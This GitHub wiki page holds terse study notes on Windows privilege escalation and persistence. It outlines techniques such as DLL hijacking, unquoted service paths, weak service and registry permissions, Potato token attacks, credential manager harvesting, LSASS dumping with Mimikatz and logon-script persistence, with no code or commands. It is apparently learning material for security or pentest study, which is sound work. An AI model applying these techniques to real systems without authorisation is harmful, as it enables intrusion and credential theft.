Privilege Escalation - caitlinmallen/TechWiki GitHub Wiki

Privilege Escalation

  • Privilege Escalation Methods
    • Many privilege escalation methods
      • Stored credentials
      • Window kernel exploit
      • DLL hijacking
      • Unquoted service paths
      • Etc
  • Stored Credentials
    • Searching for username, passwords, and even config files in the registry
    • Searching for usernames and password files to dump the passwords with Powershell Scripts and escalate the privileges
  • Windows Kernel Exploit
    • Operating system patches mismatch
    • Failing to update means you can be exploited
  • DLL Hijacking
    • Place a malicious DLL on system
    • It will search for the DLL to complete running, if a DLL does not exist they will place a malicious DLL somewhere in the search order to perform the exploitation
  • Unquoted service paths
    • binPath attributes contain the declaration of the location of the binary that related to any service to execute in Windows
    • When Windows searches for the binary it does not find it and the attacker can exploit this
      • Service path is unquoted
      • Path contains a space
      • Should have written permission in one of the intermediate folders
  • Weak Folder Permissions
    • If a user has write permissions in a folder used by the service, the user can replace the binary to a malicious one
    • When the service is restarted the malicious binary is executed with higher privileges
    • Replacing the file by copying the payload to the service binary location
  • Weak Service Permissions
    • Created by the system services with weak permission can lead to privilege escalation
    • If the Authenticated Users has SERVICE_ALL_ACCESS in a service, then the related binary to the services can be modified
    • When Windows makes a call to start the service, it calls the ServiceMain function and expects a return from this call
    • Modify the config using and starting the service to execute the payload
  • Weak Registry Permissions
    • Services in HKLM\SYSTEM\CurrentControlSet\Services\service_name
    • A binary that is going to be executed by the service can be changed to have Full Control
  • Always Install Elevated
    • Allows the low privilege users to get a higher privilege by installing an MSI
  • Modifiable Autorun
    • Attacker can replace the file with his payload by modifying the path to autorun
    • When someone in the admin group login is logged in to execute payload and get elevated privileges
  • Tater/Hot Potato
    • Potato
    • Uses known Windows issues to gain local privilege escalation in default configurations
  • Token Manipulation
    • Compromise services like Apache, SQL, etc
      • Used by pen testers in engagements
    • Rotten potato
      • Trick NT Authority/system account
      • Use MitM authentication attempt
      • Impersonate the token just negotiated
    • Juicy potato
      • Leverages the privilege escalation chain based on BITS service having a listener on 127.0.0.1:6666
  • Abusing Token
    • Exploitable privileges like token privilege can be used alone to get system level access
    • Three ways
      • Exploitable privileges
      • Exploitable partial writes
      • Abusing existing service accounts
  • Configs and Password Files
  • Credentials Manager
    • Lets you view and delete your saved credentials for signing into websites, connected apps, and networks
    • First step that the attackers will perform is a search for the credential manager in order to discover credentials for the local admin account
    • Admin passwords can be retrieved via GPO preferences
    • Third party software may store credentials here
  • Fake Login
    • Common method to fool victim to enter credentials into a fake thing
  • LSASS Dumping passwords
    • Remotely extract credentials from the Local Security Authority Subsystem
    • Contains all service providers which are packets managing different types of authentication
    • Can use extraction tools like Mimikatz

Persistence

  • Persistence Methods
    • Startup folders
    • Registry keys
    • Etc
  • Guides to Persistence
    • Have an idea of the persistence strategy
    • Take time to understand the limitations and advantages
    • Experiment with different payloads
    • Learn about staged and stageless payloads
    • Use of different transports
  • Logon Scripts
    • Use scripts to automatically execute at boot or logon initialization to establish persistence
    • Maintains persistence
  • Levels of Persistence
    • Medium mandatory level of a standard user
  • Process and DLL Injections
    • Uses the search order listed to locate and load a DLL
    • Used by threat actors to take advantage of by hijacking